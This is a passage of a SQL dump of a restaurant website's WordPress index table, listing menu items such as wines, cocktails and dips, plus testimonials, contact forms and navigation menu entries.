19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(938,NULL,NULL,3143,'post','restaurant-menu',1,0,NULL,NULL,'Niepoort &#8216;Redoma Branco&#8217; 2012','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:21','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(939,NULL,NULL,3144,'post','restaurant-menu',1,0,NULL,NULL,'Peachy Jalapeno Guacamole','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:21','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(940,NULL,NULL,3145,'post','restaurant-menu',1,0,NULL,NULL,'Tomato-Goat Cheese Spread','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:21','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(941,NULL,NULL,3146,'post','restaurant-menu',1,0,NULL,NULL,'Garlic Garbanzo Bean Spread','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:21','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(942,NULL,NULL,3147,'post','restaurant-menu',1,0,NULL,NULL,'Artichoke Caprese Platter','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:21','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(943,NULL,NULL,3148,'post','restaurant-menu',1,0,NULL,NULL,'Pastrami Roll','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:21','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(944,NULL,NULL,3149,'post','restaurant-menu',1,0,NULL,NULL,'Ham &#038; Potato Sandwiches','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:21','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(945,NULL,NULL,3150,'post','restaurant-menu',1,0,NULL,NULL,'Brownie Batter Dip','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(946,NULL,NULL,3151,'post','restaurant-menu',1,0,NULL,NULL,'Caprese Salad Kabobs','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(947,NULL,NULL,1346,'post','restaurant-menu',1,0,NULL,NULL,'Layered Hummus Dip','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(948,NULL,NULL,3152,'post','testimonials',1,0,NULL,NULL,'1','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(949,NULL,NULL,3153,'post','testimonials',1,0,NULL,NULL,'2','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(950,NULL,NULL,603,'post','testimonials',1,0,NULL,NULL,'3','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(951,NULL,NULL,1348,'post','restaurant-menu',1,0,NULL,NULL,'Corona Buckets','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(952,NULL,NULL,1349,'post','restaurant-menu',1,0,NULL,NULL,'Bud Buckets','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(953,NULL,NULL,1350,'post','restaurant-menu',1,0,NULL,NULL,'Malbec, Dona Paula','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(954,NULL,NULL,1351,'post','restaurant-menu',1,0,NULL,NULL,'Merlot, 14 Hands','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(955,NULL,NULL,1352,'post','restaurant-menu',1,0,NULL,NULL,'Chardonnay, Hands of Time','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(956,NULL,NULL,1353,'post','restaurant-menu',1,0,NULL,NULL,'Moscato','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(957,NULL,NULL,1354,'post','restaurant-menu',1,0,NULL,NULL,'Riesling','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(958,NULL,NULL,1355,'post','restaurant-menu',1,0,NULL,NULL,'Painkiller','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(959,NULL,NULL,1356,'post','restaurant-menu',1,0,NULL,NULL,'Grey Goose Mule','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(960,NULL,NULL,1357,'post','restaurant-menu',1,0,NULL,NULL,'Cinnamon Toast Crunch','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(961,NULL,NULL,1358,'post','restaurant-menu',1,0,NULL,NULL,'Rum Punch','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(962,NULL,NULL,1360,'post','restaurant-menu',1,0,NULL,NULL,'Cruzan Classic Mojito','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(963,NULL,NULL,1361,'post','restaurant-menu',1,0,NULL,NULL,'Long Island Ice Tea Pitcher','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(964,NULL,NULL,1362,'post','restaurant-menu',1,0,NULL,NULL,'Watermelon Margarita Pitcher','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(965,NULL,NULL,1363,'post','restaurant-menu',1,0,NULL,NULL,'Mojito Pitcher','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(966,NULL,NULL,2904,'post','testimonials',1,0,NULL,NULL,'6','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(967,NULL,NULL,2906,'post','testimonials',1,0,NULL,NULL,'4','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(968,NULL,NULL,3154,'post','wpcf7_contact_form',1,0,NULL,NULL,'Contact form 1','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(969,NULL,NULL,3155,'post','wpcf7_contact_form',1,0,NULL,NULL,'Reservation form','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(970,NULL,NULL,2905,'post','testimonials',1,0,NULL,NULL,'5','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(971,NULL,NULL,3156,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(972,NULL,NULL,3157,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(973,NULL,NULL,3158,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(974,NULL,NULL,3159,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(975,NULL,NULL,3160,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(976,NULL,NULL,3161,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(977,NULL,NULL,3162,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(978,NULL,NULL,3163,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(979,NULL,NULL,3164,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(980,NULL,NULL,3165,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(981,NULL,NULL,3166,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(982,NULL,NULL,3167,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(983,NULL,NULL,3168,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(984,NULL,NULL,3169,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(985,NULL,NULL,3170,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(986,NULL,NULL,3171,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(987,NULL,NULL,3172,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(988,NULL,NULL,3173,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(989,NULL,NULL,3174,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(990,NULL,NULL,3175,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(991,NULL,NULL,3176,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(992,NULL,NULL,3177,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(993,NULL,NULL,3178,'post','nav_menu_item',1,3034,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(994,NULL,NULL,3179,'post','nav_menu_item',1,3034,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(995,NULL,NULL,3180,'post','nav_menu_item',1,3034,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(996,NULL,NULL,3181,'post','nav_menu_item',1,3034,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(997,NULL,NULL,3182,'post','nav_menu_item',1,3034,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(998,NULL,NULL,3183,'post','nav_menu_item',1,3034,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(999,NULL,NULL,3184,'post','nav_menu_item',1,3034,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(1000,NULL,NULL,3185,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1001,NULL,NULL,3186,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1002,NULL,NULL,3187,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1003,NULL,NULL,3188,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1004,NULL,NULL,3189,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1005,NULL,NULL,3190,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1006,NULL,NULL,3191,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1007,NULL,NULL,3192,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1008,NULL,NULL,3193,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1009,NULL,NULL,3194,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1010,NULL,NULL,3195,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1011,NULL,NULL,3196,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1012,NULL,NULL,3197,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1013,NULL,NULL,3198,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1014,NULL,NULL,3199,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1015,NULL,NULL,3200,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2020-12-05 16:06:23','2021-01-29 